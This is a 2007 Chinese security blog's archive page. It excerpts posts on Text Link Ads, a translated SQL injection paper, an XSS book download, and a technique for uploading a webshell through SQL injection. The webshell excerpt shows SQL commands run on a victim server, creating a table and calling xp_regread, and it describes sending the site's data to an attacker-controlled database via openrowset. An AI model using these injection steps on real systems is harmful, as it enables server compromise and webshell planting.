2007年5月 的日志
把网站链接卖一个好价钱: Text Link Ads 注册攻略
鬼仔注:很多使用LBS的朋友在放置 LBS 放置 Text Link Ads 代码的方法 ,希望对大家有所帮助。
来源:广告发布者论坛
Text Link Ads 是一家提供文字链接交易的平台,用户主要通过它出售和购买文字链接。Text LinkAds主要针对的是blog,所以blog的链接会相对比较好出售。Text LinkAds目前只有英文版本,但是它支持所有语言的网站,在Text 阅读全文 »
Tags: Text Link AdsLBS 放置 Text Link Ads 代码的方法
鬼仔:
转载请注明来源( http://www.huaidan.org/blog )
Text Link Ads 最近很火,如果你还不知道 Text Link Ads 是什么的话,那看看 这篇文章 吧,里面包括了申请攻略。
很多使用 LBS 的朋友在放置代码的时候遇到了问题,这里跟大家说下 LBS 放置 Text Link Ads 代码的方法,希望对那些使用 LBS ,但是在放置 Text Link Ads 代码时遇到问题的朋友有所帮助。效果请看 阅读全文 »
Advanced SQL Injection In SQL Server Applications
/*******************************************************
作者:Chris Anley([email protected])
翻译:黯魂[S.S.T]
注意:转载请注明来自http://www.m0ther.cn,并恳请指正其中不准确之处:)
另外,译文我已经做成pdf格式文档,需要的朋友可以直接下载.
下载地址为:http://www.m0ther.cn/paper/advanced_sql_injection.pdf
********************************************************/
基于SQL server应用的高级SQL注入技术
阅读全文 »
Xss Exploits and Defense (Paperback) [PDF]
鬼仔注:一本关于XSS的书,PDF格式,英文版。
7jdg那里看到的。
不过7j那里的下载链接好像失效了
我重传到了另外一个地方,提供下载。
下载地址:
Xss Exploits and Defense (Paperback).rar
亚马逊上关于此书的介绍:
http://www.amazon.com/Cross-Site-Scripting-Attacks-Exploits/dp/1597491543
图:
突破SQL错误提示上传webshell
文章作者:疯狗 http://www.cnbct.org/
得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库
然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))–
在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 阅读全文 »
Tags: WebShell